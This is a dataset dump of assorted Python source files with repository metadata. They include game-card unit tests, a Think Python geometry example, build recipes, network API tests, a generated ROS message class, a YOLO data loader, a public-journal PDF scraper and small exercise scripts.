self.plr.test_input = ["Don't change", "Trash Copper"]
favors = self.plr.favors.get()
self.plr.play_card(card)
self.assertIn("Copper", self.g.trashpile)
self.assertIn("Student", self.plr.piles[Piles.DECK])
self.assertEqual(self.plr.favors.get(), favors + 1)
def test_play_trash_non_treas(self):
"""Play a student - don't rotate, but trash a non treasure"""
while True:
card = self.g["Wizards"].remove()
if card.name == "Student":
break
self.plr.piles[Piles.HAND].set("Copper", "Silver", "Gold", "Estate")
self.plr.add_card(card, Piles.HAND)
self.plr.test_input = ["Don't change", "Trash Estate"]
favors = self.plr.favors.get()
self.plr.play_card(card)
self.assertIn("Estate", self.g.trashpile)
self.assertNotIn("Student", self.plr.piles[Piles.DECK])
self.assertEqual(self.plr.favors.get(), favors)
def test_play_trash_rotate(self):
"""Play a student - rotate, and trash a non treasure"""
while True:
card = self.g["Wizards"].remove()
if card.name == "Student":
break
self.plr.piles[Piles.HAND].set("Copper", "Silver", "Gold", "Estate")
self.plr.add_card(card, Piles.HAND)
self.plr.test_input = ["Rotate", "Trash Estate"]
self.plr.play_card(card)
card = self.g["Wizards"].remove()
self.assertEqual(card.name, "Conjurer")
###############################################################################
if __name__ == "__main__": # pragma: no cover
unittest.main()
# EOF
| [
"[email protected]"
] | |
01f32c1f857b3e6cb6206443d4778d3411fa38fa | 85de10a9467b3cd88ce83227bee0d71706e2c2b0 | /c15/point1.py | bcd93dd9a81cdd42b3999ae7c53212cba3aa9078 | [] | no_license | sreejithev/thinkpythonsolutions | f0bbfc0951e57e9b81f50aabf968860484081524 | 59481fd3d2976e73691a3fff97e083c336070cea | refs/heads/master | 2019-07-22T14:08:54.890004 | 2017-09-15T05:06:26 | 2017-09-15T05:06:26 | 94,759,672 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,480 | py | """
Code example from Think Python, by Allen B. Downey.
Available from http://thinkpython.com
Copyright 2012 Allen B. Downey.
Distributed under the GNU General Public License at gnu.org/licenses/gpl.html.
"""
class Point(object):
"""Represents a point in 2-D space."""
def print_point(p):
"""Print a Point object in human-readable format."""
print '(%g, %g)' % (p.x, p.y)
class Rectangle(object):
"""Represents a rectangle.
attributes: width, height, corner.
"""
def find_center(rect):
"""Returns a Point at the center of a Rectangle."""
p = Point()
p.x = rect.corner.x + rect.width/2.0
p.y = rect.corner.y + rect.height/2.0
return p
def grow_rectangle(rect, dwidth, dheight):
"""Modify the Rectangle by adding to its width and height.
rect: Rectangle object.
dwidth: change in width (can be negative).
dheight: change in height (can be negative).
"""
rect.width += dwidth
rect.height += dheight
def main():
blank = Point()
blank.x = 3
blank.y = 4
print 'blank',
print_point(blank)
box = Rectangle()
box.width = 100.0
box.height = 200.0
box.corner = Point()
box.corner.x = 0.0
box.corner.y = 0.0
center = find_center(box)
print 'center',
print_point(center)
print box.width
print box.height
print 'grow'
grow_rectangle(box, 50, 100)
print box.width
print box.height
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
d7a3715564bf502e8f7675515f39437fd16aea6d | 1adc05008f0caa9a81cc4fc3a737fcbcebb68995 | /hardhat/recipes/libsecret.py | b42a31342843ec94f44a8536408092b7348707ab | [
"MIT",
"BSD-3-Clause"
] | permissive | stangelandcl/hardhat | 4aa995518697d19b179c64751108963fa656cfca | 1ad0c5dec16728c0243023acb9594f435ef18f9c | refs/heads/master | 2021-01-11T17:19:41.988477 | 2019-03-22T22:18:44 | 2019-03-22T22:18:52 | 79,742,340 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 672 | py | from .base import GnuRecipe
class LibSecretRecipe(GnuRecipe):
def __init__(self, *args, **kwargs):
super(LibSecretRecipe, self).__init__(*args, **kwargs)
self.sha256 = '9ce7bd8dd5831f2786c935d82638ac42' \
'8fa085057cc6780aba0e39375887ccb3'
self.name = 'libsecret'
self.version = '0.18.5'
self.version_regex = r'(?P<version>\d+\.\d+(\.\d+)?)'
self.depends = ['gcrypt', 'glib', 'gobject-introspection', 'vala']
self.url = 'http://ftp.gnome.org/pub/gnome/sources/libsecret/' \
'$short_version/libsecret-$version.tar.xz'
self.configure_args += ['--enable-vala=no']
| [
"[email protected]"
] | |
da3f14eb4676c866d47a2784491765e6f5abcac8 | 0bbeb0bbe788ec5a8ba15acf159e4b913985bba4 | /tests/testsuite/a_basic/tests_03_networking.py | 5173cf96368f92efba523e5f790107970eeb035a | [
"Apache-2.0"
] | permissive | GlenDC/0-core | 629bd9836ab4ff2fe0c40628419b58205bb64648 | 807fa1939199fa3aa3b3e57679f61bb6c72cc57f | refs/heads/master | 2021-06-17T19:52:40.405225 | 2017-06-14T16:42:39 | 2017-06-14T16:42:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,190 | py | from utils.utils import BaseTest
import time
import unittest
class BasicNetworking(BaseTest):
def setUp(self):
super(BasicNetworking, self).setUp()
self.check_g8os_connection(BasicNetworking)
def test001_join_leave_list_zerotier(self):
""" g8os-012
*Test case for testing joining, listing, leaving zerotier networks*
**Test Scenario:**
#. Get NetworkId using zerotier API
#. Join zerotier network (N1), should succeed
#. List zerotier network
#. Join fake zerotier network (N1), should fail
#. Leave zerotier network (N1), should succeed
#. List zerotier networks, N1 should be gone
#. Leave zerotier network (N1), should fail
"""
self.lg('{} STARTED'.format(self._testID))
self.lg('Get NetworkId using zerotier API')
networkId = self.getZtNetworkID()
self.lg('Join zerotier network (N1), should succeed')
self.client.zerotier.join(networkId)
self.lg('List zerotier network')
r = self.client.zerotier.list()
self.assertIn(networkId, [x['nwid'] for x in r])
self.lg('Join fake zerotier network (N1), should fail')
with self.assertRaises(RuntimeError):
self.client.zerotier.join(self.rand_str())
self.lg('Leave zerotier network (N1), should succeed')
self.client.zerotier.leave(networkId)
self.lg('List zerotier networks, N1 should be gone')
r = self.client.zerotier.list()
self.assertNotIn(networkId, [x['nwid'] for x in r])
self.lg('Leave zerotier network (N1), should fail')
with self.assertRaises(RuntimeError):
self.client.zerotier.leave(networkId)
self.lg('{} ENDED'.format(self._testID))
def test002_create_delete_list_bridges(self):
""" g8os-013
*Test case for testing creating, listing, deleting bridges*
**Test Scenario:**
#. Create bridge (B1), should succeed
#. List bridges, B1 should be listed
#. Create bridge with same name of (B1), should fail
#. Delete bridge B1, should succeed
#. List bridges, B1 should be gone
#. Delete bridge B1, should fail
"""
self.lg('{} STARTED'.format(self._testID))
self.lg('Create bridge (B1), should succeed')
bridge_name = self.rand_str()
self.client.bridge.create(bridge_name)
self.lg('List bridges, B1 should be listed')
response = self.client.bridge.list()
self.assertIn(bridge_name, response)
self.lg('Create bridge with same name of (B1), should fail')
with self.assertRaises(RuntimeError):
self.client.bridge.create(bridge_name)
self.lg('Delete bridge B1, should succeed')
self.client.bridge.delete(bridge_name)
self.lg('List bridges, B1 should be gone')
response = self.client.bridge.list()
self.assertNotIn(bridge_name, response)
self.lg('Delete bridge B1, should fail')
with self.assertRaises(RuntimeError):
self.client.bridge.delete(bridge_name)
self.lg('{} ENDED'.format(self._testID))
| [
"[email protected]"
] | |
52d164c079e7024407ee033d66648507ebb48c67 | 99052370591eadf44264dbe09022d4aa5cd9687d | /install/lib/python2.7/dist-packages/cwru_msgs/msg/_NavSatFix.py | 7fc5ec0e156d178ec0e03f7841197d2a80f8b5d4 | [] | no_license | brucemingxinliu/ros_ws | 11b1a3e142132925d35b3adf929f1000392c5bdc | 45f7e553ea20b79e3e93af5f77a1b14b64184875 | refs/heads/master | 2021-01-24T03:36:47.043040 | 2018-02-26T00:53:37 | 2018-02-26T00:53:37 | 122,892,702 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,328 | py | # This Python file uses the following encoding: utf-8
"""autogenerated by genpy from cwru_msgs/NavSatFix.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import cwru_msgs.msg
import std_msgs.msg
class NavSatFix(genpy.Message):
_md5sum = "2d3a8cd499b9b4a0249fb98fd05cfa48"
_type = "cwru_msgs/NavSatFix"
_has_header = True #flag to mark the presence of a Header object
_full_text = """# Navigation Satellite fix for any Global Navigation Satellite System
#
# Specified using the WGS 84 reference ellipsoid
# Header specifies ROS time and frame of reference for this fix.
Header header
# satellite fix status information
cwru_msgs/NavSatStatus status
# Latitude [degrees]. Positive is north of equator; negative is south.
float64 latitude
# Longitude [degrees]. Positive is east of prime meridian; negative is west.
float64 longitude
# Altitude [m]. Positive is above the WGS 84 ellipsoid.
float64 altitude
# Position covariance [m^2] defined relative to a tangential plane
# through the reported position. The components are East, North, and
# Up (ENU), in row-major order.
#
# Beware: this coordinate system exhibits singularities at the poles.
float64[9] position_covariance
# If the covariance of the fix is known, fill it in completely. If the
# GPS receiver provides the variance of each measurement, put them
# along the diagonal. If only Dilution of Precision is available,
# estimate an approximate covariance from that.
uint8 COVARIANCE_TYPE_UNKNOWN = 0
uint8 COVARIANCE_TYPE_APPROXIMATED = 1
uint8 COVARIANCE_TYPE_DIAGONAL_KNOWN = 2
uint8 COVARIANCE_TYPE_KNOWN = 3
uint8 position_covariance_type
================================================================================
MSG: std_msgs/Header
# Standard metadata for higher-level stamped data types.
# This is generally used to communicate timestamped data
# in a particular coordinate frame.
#
# sequence ID: consecutively increasing ID
uint32 seq
#Two-integer timestamp that is expressed as:
# * stamp.sec: seconds (stamp_secs) since epoch (in Python the variable is called 'secs')
# * stamp.nsec: nanoseconds since stamp_secs (in Python the variable is called 'nsecs')
# time-handling sugar is provided by the client library
time stamp
#Frame this data is associated with
# 0: no frame
# 1: global frame
string frame_id
================================================================================
MSG: cwru_msgs/NavSatStatus
# Navigation Satellite fix status for any Global Navigation Satellite System
# Whether to output an augmented fix is determined by both the fix
# type and the last time differential corrections were received. A
# fix is valid when status >= STATUS_FIX.
int8 STATUS_NO_FIX = -1 # unable to fix position
int8 STATUS_FIX = 0 # unaugmented fix
int8 STATUS_SBAS_FIX = 1 # with satellite-based augmentation
int8 STATUS_GBAS_FIX = 2 # with ground-based augmentation
int8 status
# Bits defining which Global Navigation Satellite System signals were
# used by the receiver.
uint16 SERVICE_GPS = 1
uint16 SERVICE_GLONASS = 2
uint16 SERVICE_COMPASS = 4 # includes BeiDou.
uint16 SERVICE_GALILEO = 8
uint16 service
"""
# Pseudo-constants
COVARIANCE_TYPE_UNKNOWN = 0
COVARIANCE_TYPE_APPROXIMATED = 1
COVARIANCE_TYPE_DIAGONAL_KNOWN = 2
COVARIANCE_TYPE_KNOWN = 3
__slots__ = ['header','status','latitude','longitude','altitude','position_covariance','position_covariance_type']
_slot_types = ['std_msgs/Header','cwru_msgs/NavSatStatus','float64','float64','float64','float64[9]','uint8']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
header,status,latitude,longitude,altitude,position_covariance,position_covariance_type
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(NavSatFix, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.header is None:
self.header = std_msgs.msg.Header()
if self.status is None:
self.status = cwru_msgs.msg.NavSatStatus()
if self.latitude is None:
self.latitude = 0.
if self.longitude is None:
self.longitude = 0.
if self.altitude is None:
self.altitude = 0.
if self.position_covariance is None:
self.position_covariance = [0.,0.,0.,0.,0.,0.,0.,0.,0.]
if self.position_covariance_type is None:
self.position_covariance_type = 0
else:
self.header = std_msgs.msg.Header()
self.status = cwru_msgs.msg.NavSatStatus()
self.latitude = 0.
self.longitude = 0.
self.altitude = 0.
self.position_covariance = [0.,0.,0.,0.,0.,0.,0.,0.,0.]
self.position_covariance_type = 0
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))
_x = self.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_struct_bH3d.pack(_x.status.status, _x.status.service, _x.latitude, _x.longitude, _x.altitude))
buff.write(_struct_9d.pack(*self.position_covariance))
buff.write(_struct_B.pack(self.position_covariance_type))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
if self.header is None:
self.header = std_msgs.msg.Header()
if self.status is None:
self.status = cwru_msgs.msg.NavSatStatus()
end = 0
_x = self
start = end
end += 12
(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.header.frame_id = str[start:end].decode('utf-8')
else:
self.header.frame_id = str[start:end]
_x = self
start = end
end += 27
(_x.status.status, _x.status.service, _x.latitude, _x.longitude, _x.altitude,) = _struct_bH3d.unpack(str[start:end])
start = end
end += 72
self.position_covariance = _struct_9d.unpack(str[start:end])
start = end
end += 1
(self.position_covariance_type,) = _struct_B.unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))
_x = self.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_struct_bH3d.pack(_x.status.status, _x.status.service, _x.latitude, _x.longitude, _x.altitude))
buff.write(self.position_covariance.tostring())
buff.write(_struct_B.pack(self.position_covariance_type))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
if self.header is None:
self.header = std_msgs.msg.Header()
if self.status is None:
self.status = cwru_msgs.msg.NavSatStatus()
end = 0
_x = self
start = end
end += 12
(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.header.frame_id = str[start:end].decode('utf-8')
else:
self.header.frame_id = str[start:end]
_x = self
start = end
end += 27
(_x.status.status, _x.status.service, _x.latitude, _x.longitude, _x.altitude,) = _struct_bH3d.unpack(str[start:end])
start = end
end += 72
self.position_covariance = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=9)
start = end
end += 1
(self.position_covariance_type,) = _struct_B.unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
_struct_3I = struct.Struct("<3I")
_struct_bH3d = struct.Struct("<bH3d")
_struct_9d = struct.Struct("<9d")
_struct_B = struct.Struct("<B")
| [
"[email protected]"
] | |
456dccc0d0b058daea30a5811b67c32f327eaad5 | eb9f655206c43c12b497c667ba56a0d358b6bc3a | /python/testData/breadcrumbs/exceptAs.py | 98450c359de443a2f944b026192782eee6f6b9cc | [
"Apache-2.0"
] | permissive | JetBrains/intellij-community | 2ed226e200ecc17c037dcddd4a006de56cd43941 | 05dbd4575d01a213f3f4d69aa4968473f2536142 | refs/heads/master | 2023-09-03T17:06:37.560889 | 2023-09-03T11:51:00 | 2023-09-03T12:12:27 | 2,489,216 | 16,288 | 6,635 | Apache-2.0 | 2023-09-12T07:41:58 | 2011-09-30T13:33:05 | null | UTF-8 | Python | false | false | 61 | py | try:
print "abc"
except KeyError as e:
print "d<caret>ef" | [
"[email protected]"
] | |
6b3e10704b67a05bbd5fc73fe408618d870f0728 | 262311e60529868e38c2c57ee3db573f8e11c458 | /qa-automated/runner.py | c841c2e6d2e393b0fa9c3ef97393f624bae447f1 | [] | no_license | huileizhan227/untitled | 1c5604736d9ffcce6f7cb7e308cdc0ebd07e116a | 07df74c89291b1664a28e3c8dcba51a917f1835f | refs/heads/master | 2023-01-27T11:51:37.609210 | 2020-04-16T11:49:59 | 2020-04-16T11:49:59 | 150,606,504 | 1 | 0 | null | 2023-01-09T12:00:12 | 2018-09-27T15:12:18 | HTML | UTF-8 | Python | false | false | 2,700 | py | import os
import sys
import time
import qasite
import pytest
import config
from multiprocessing import Pool
from performance import Report as Perf
from common import devicectl
from common import serverctl
from common import utils
def run(project_name=None, build_id=None, test_name_filter=None):
# before
if (not project_name) or (not build_id):
log_folder = os.path.join(config.LOG_FOLDER, utils.get_formated_time())
else:
log_folder = os.path.join(config.LOG_FOLDER, project_name, str(build_id))
# run server
serverctl.run_servers(log_folder=log_folder)
devicectl.uninstall_apk()
devicectl.uninstall_ua2()
devicectl.wakeup()
# run cases
devices = config.devices
# case_process_list = []
args_list = []
for device in devices:
report_folder = os.path.join(log_folder, device['name'])
if not os.path.exists(report_folder):
os.makedirs(report_folder)
perf_log = os.path.join(report_folder, 'performance.csv')
perf_report = os.path.join(report_folder, 'performance.html')
ui_report = os.path.join(report_folder, 'report.html')
device['perf_report'] = perf_report
device['ui_report'] = ui_report
args=(perf_log, perf_report, ui_report, device['id'], test_name_filter)
args_list.append(args)
pool = Pool(len(args_list))
pool.starmap(run_cases, args_list)
pool.close()
pool.join()
# stop server
print('run cases over, killing servers...')
serverctl.stop_servers()
# upload report
# todo 先上传一个测试报告,多报告需qasite支持
if (project_name is not None) and (build_id is not None):
print('uploading aotomated testing report...')
if not qasite.upload_report(devices[0]['ui_report'], 0, project_name, build_id):
print('upload failed')
print('uploading performance testing report...')
if not qasite.upload_report(devices[0]['perf_report'], 1, project_name, build_id):
print('upload failed')
print('test finished.')
def run_cases(perf_log, perf_report, ui_report, device_id, test_name_filter):
# runpytest
arg_list = [
'cases/app',
'--html={}'.format(ui_report),
'--self-contained-html',
'--device-id={}'.format(device_id),
'--perf-log={}'.format(perf_log),
'--perf-report={}'.format(perf_report)
]
if test_name_filter:
arg_list.extend(['-k', test_name_filter])
pytest.main(arg_list)
if __name__ == "__main__":
test_name_filter = None
if len(sys.argv) > 1:
test_name_filter = sys.argv[1]
run(test_name_filter=test_name_filter)
| [
"[email protected]"
] | |
4926ffe92721d5b449773c2caff35eabfbef1e6a | b410490f4249b4075eab92e3a16000a8b839e18c | /object_detection/YOLOv3/dataset.py | 835b5b26d48edf15af90e53cc530340dfc619848 | [] | no_license | TaeYeon-kim-ai/Pytorch | 5936145643a2b36b5c52e43f735bda81264ed6d5 | 452e5543a959f2b280b088635953985e1101041d | refs/heads/master | 2023-07-01T17:29:30.558774 | 2021-08-12T19:01:36 | 2021-08-12T19:01:36 | 387,499,162 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,282 | py | #import config
import numpy as np
import os
import pandas as pd
import torch
from PIL import Image, ImageFile
from torch.utils.data import Dataset, DataLoader
from utils import (
iou_width_height as iou,
non_max_suppression_as_nms,
)
ImageFile.LOAD_TRUNCATED_IMAGES = True
class YOLODataset(Dataset) :
def __init__(
self,
csv_file,
img_dir, label_dir,
anchors,
image_size = 416,
S = [13, 26, 52],
C = 20,
transform = None,
):
self.annotations = pd.read_csv(csv_file)
self.img_dir = img_dir
self.label_dir = label_dir
self.transform = transform
self.S = S
self.anchors
self.num_anchors = self.anchors.shape[0]
self.num_anchors_per_scale = self.num_anchors // 3
self.C = C
self.ignore_iou_thresh = 0.5
def __len__(self) :
return len(self.annotation)
def __getitem__(self, index) :
label_path = os.path.join(self.label_dir, self.annotations.iloc[index, 1])
bboxes = np.roll(np.loadtxt(fname=label_path, delimiter=" ", ndmim = 2), 4, axis = 1).tolist()
img_path = os.path.join(self.img_dir, self.annotations.iloc[index, 0])
image = np.array(Image.open(img_path).convert("RGB"))
if self.transform :
augmentation = self.transform(iamge = image, bboxes = bboxes)
image = augmentation["image"]
bboxes = augmentation["bboxes"]
targets = [torch.zeros((self.num_anchors // 3, S, S, 6)) for S in self.S] # [p_o, x, y , w, h, c]
for box in bboxes :
iou_anchors = iou(torch.Tensor(box[2:4]), self.anchors)
anchor_indices = iou_anchors.argsort(descending = True, dim = 0)
x, y, width, height, class_label = box
has_anchor = [False, False, False]
for anchor_idx in anchor_indices :
scale_idx = anchor_idx // self.num_anchors_per_scale # 0, 1, 2
anchor_on_scale = anchor_idx % self.num_anchors_per_scale # 0, 1, 2
S = self.S[scale_idx]
i, j = int(S*y), int(S * x) # x = 0.5, S = 13 --> int(6.5) = 6 .. 중심값 ?? roI
anchor_taken = targets[scale_idx][anchor_on_scale, i, j, 0]
if not anchor_taken and not has_anchor[scale_idx] : #anchor
targets[scale_idx][anchor_on_scale, i , j, 0] = 1
x_cell, y_cell = S*x - j, S*y - i # 6.5 both are between [0, 1]
width_cell, height_cell = (
width * S,
height * S,
)
box_coordinates = torch.tensor(
[x_cell, y_cell, width_cell, height_cell]
)
targets[scale_idx][anchor_on_scale, i, j, 1:5] = box_coordinates
targets[scale_idx][anchor_on_scale, i, j, 5] = int(class_label)
has_anchor[scale_idx] = True
elif not anchor_taken and iou_anchors[anchor_idx] > self.ignore_iou_thresh:
targets[scale_idx][anchor_on_scale, i, j, 0] = -1 #ignore this prediction
return image, tuple(targets)
| [
"[email protected]"
] | |
c0f054d4e60c35d007c3451890947d020565fbc5 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02783/s809384037.py | b1bac9c9f8363c745905fad4ee60b29b26e6e608 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 87 | py | n,d=list(map(int,input().split()))
if n%d==0:
print(n//d)
else:
print((n//d)+1) | [
"[email protected]"
] | |
fa653f9c0963489e50b7ebe54873f2359c9252e1 | 3d19e1a316de4d6d96471c64332fff7acfaf1308 | /Users/P/pere/postliste-ruter.py | 6868c570393c7a8e844c70e499b5f1ed041bc480 | [] | no_license | BerilBBJ/scraperwiki-scraper-vault | 4e98837ac3b1cc3a3edb01b8954ed00f341c8fcc | 65ea6a943cc348a9caf3782b900b36446f7e137d | refs/heads/master | 2021-12-02T23:55:58.481210 | 2013-09-30T17:02:59 | 2013-09-30T17:02:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,876 | py | # -*- coding: UTF-8 -*-
import scraperwiki
import json
from BeautifulSoup import BeautifulSoup
import datetime
import dateutil.parser
import lxml.html
import resource
import sys
import urlparse
import re
scraperwiki.scrape('http://www2.ruter.no/verdt-a-vite/presse/offentlig-journal/')
lazycache=scraperwiki.swimport('lazycache')
postlistelib=scraperwiki.swimport('postliste-python-lib')
agency = 'Ruter AS'
def report_errors(errors):
if 0 < len(errors):
print "Errors:"
for e in errors:
print e
exit(1)
def out_of_cpu(arg, spent, hard, soft):
report_errors(arg)
def process_pdf(parser, pdfurl, errors):
errors = []
postlistelib.exit_if_no_cpu_left(0, out_of_cpu, errors)
try:
pdfcontent = scraperwiki.scrape(pdfurl)
parser.preprocess(pdfurl, pdfcontent)
pdfcontent = None
# except ValueError, e:
# errors.append(e)
except IndexError, e:
errors.append(e)
def process_page_queue(parser, errors):
try:
parser.process_pages()
postlistelib.exit_if_no_cpu_left(0, out_of_cpu, errors)
except scraperwiki.CPUTimeExceededError, e:
errors.append("Processing pages interrupted")
def process_journal_pdfs(parser, listurl, errors):
# print "Finding PDFs on " + listurl
# u = urllib.parse.urlparse(listurl)
html = scraperwiki.scrape(listurl)
root = lxml.html.fromstring(html)
html = None
for ahref in root.cssselect("div.vedlegg a"):
href = ahref.attrib['href']
url = urlparse.urljoin(listurl, href)
if -1 != href.find("file://") or -1 == url.find(".pdf"):
# print "Skipping non-http URL " + url
continue
if parser.is_already_scraped(url):
True
# print "Skipping already scraped " + url
else:
# print "Will process " + url
process_pdf(parser, url, errors)
def test_small_pdfs(parser):
# Test with some smaller PDFs
errors = []
process_pdf(parser, "http://www2.ruter.no/Documents/Offentlig_journal/2012_Uke_24.pdf?epslanguage=no", errors)
process_page_queue(parser, errors)
report_errors(errors)
exit(0)
errors = []
parser = postlistelib.PDFJournalParser(agency=agency)
#test_small_pdfs(parser)
process_journal_pdfs(parser, "http://www2.ruter.no/verdt-a-vite/presse/offentlig-journal/", errors)
process_page_queue(parser, errors)
report_errors(errors)
# -*- coding: UTF-8 -*-
import scraperwiki
import json
from BeautifulSoup import BeautifulSoup
import datetime
import dateutil.parser
import lxml.html
import resource
import sys
import urlparse
import re
scraperwiki.scrape('http://www2.ruter.no/verdt-a-vite/presse/offentlig-journal/')
lazycache=scraperwiki.swimport('lazycache')
postlistelib=scraperwiki.swimport('postliste-python-lib')
agency = 'Ruter AS'
def report_errors(errors):
if 0 < len(errors):
print "Errors:"
for e in errors:
print e
exit(1)
def out_of_cpu(arg, spent, hard, soft):
report_errors(arg)
def process_pdf(parser, pdfurl, errors):
errors = []
postlistelib.exit_if_no_cpu_left(0, out_of_cpu, errors)
try:
pdfcontent = scraperwiki.scrape(pdfurl)
parser.preprocess(pdfurl, pdfcontent)
pdfcontent = None
# except ValueError, e:
# errors.append(e)
except IndexError, e:
errors.append(e)
def process_page_queue(parser, errors):
try:
parser.process_pages()
postlistelib.exit_if_no_cpu_left(0, out_of_cpu, errors)
except scraperwiki.CPUTimeExceededError, e:
errors.append("Processing pages interrupted")
def process_journal_pdfs(parser, listurl, errors):
# print "Finding PDFs on " + listurl
# u = urllib.parse.urlparse(listurl)
html = scraperwiki.scrape(listurl)
root = lxml.html.fromstring(html)
html = None
for ahref in root.cssselect("div.vedlegg a"):
href = ahref.attrib['href']
url = urlparse.urljoin(listurl, href)
if -1 != href.find("file://") or -1 == url.find(".pdf"):
# print "Skipping non-http URL " + url
continue
if parser.is_already_scraped(url):
True
# print "Skipping already scraped " + url
else:
# print "Will process " + url
process_pdf(parser, url, errors)
def test_small_pdfs(parser):
# Test with some smaller PDFs
errors = []
process_pdf(parser, "http://www2.ruter.no/Documents/Offentlig_journal/2012_Uke_24.pdf?epslanguage=no", errors)
process_page_queue(parser, errors)
report_errors(errors)
exit(0)
errors = []
parser = postlistelib.PDFJournalParser(agency=agency)
#test_small_pdfs(parser)
process_journal_pdfs(parser, "http://www2.ruter.no/verdt-a-vite/presse/offentlig-journal/", errors)
process_page_queue(parser, errors)
report_errors(errors)
| [
"[email protected]"
] | |
274db1c7e4366ef5d355c5f0b6718f4d5f41f569 | 33524b5c049f934ce27fbf046db95799ac003385 | /Дистанционная_подготовка/Программирование_на_python/9_списки/zadache_N.py | bb6732945983d5ab8c93702cbfcc871d84f63cc6 | [] | no_license | mgbo/My_Exercise | 07b5f696d383b3b160262c5978ad645b46244b70 | 53fb175836717493e2c813ecb45c5d5e9d28dd23 | refs/heads/master | 2022-12-24T14:11:02.271443 | 2020-10-04T04:44:38 | 2020-10-04T04:44:38 | 291,413,440 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 118 | py |
l = list(map(int, input().split()))
i = 0
for _ in range(len(l)//2):
l[i], l[i+1] = l[i+1], l[i]
i +=2
print (*l) | [
"[email protected]"
] | |
c151f1cb971c5514c93deb2d3355846a22aa6971 | 6f21068b31084e81f38db304a51a2609d8af37cd | /2_Scientific_Libraries/plotsine.py | 13f08b42e470e8a434e801048a9ba254ea8288aa | [] | no_license | vickyf/eurocontrol_datascience | 374b889cac7b8d377caa78079fb57098e73bba0a | 0a7c09002e3b5f22ad563b05a6b4afe4cb6791d7 | refs/heads/master | 2020-03-19T06:03:14.864839 | 2018-06-04T07:24:25 | 2018-06-04T07:24:25 | 135,986,678 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 142 | py | %matplotlib inline
import matplotlib.pyplot as plt
import numpy as np
x = np.linspace(0,2*np.pi, 100)
y = np.sin(x)
plt.plot(x,y)
plt.show() | [
"[email protected]"
] | |
07bac4b0659c7151d22ec455cb5bbb340db2a1c5 | 6219e6536774e8eeb4cadc4a84f6f2bea376c1b0 | /common/util_vietnamese_test.py | 3fa3dfa1e91ecf9cc5553850f8be6ef7c293dfd5 | [
"MIT"
] | permissive | nguyenminhthai/choinho | 109d354b410b92784a9737f020894d073bea1534 | d2a216fe7a5064d73cdee3e928a7beef7f511fd1 | refs/heads/master | 2023-05-07T16:51:46.667755 | 2019-10-22T07:53:41 | 2019-10-22T07:53:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,948 | py | #!/usr/bin/env python
# encoding: utf-8
import unittest
from common import util_vietnamese as uv
class TestUtilVietnamese(unittest.TestCase):
def testConvert2Unsign(self):
self.assertEquals(uv.convert2Unsign(u'Dĩ độc trị độc'), u'Di doc tri doc')
self.assertEquals(uv.convert2Unsign(u'Ông ăn ổi Ạ'), u'Ong an oi A')
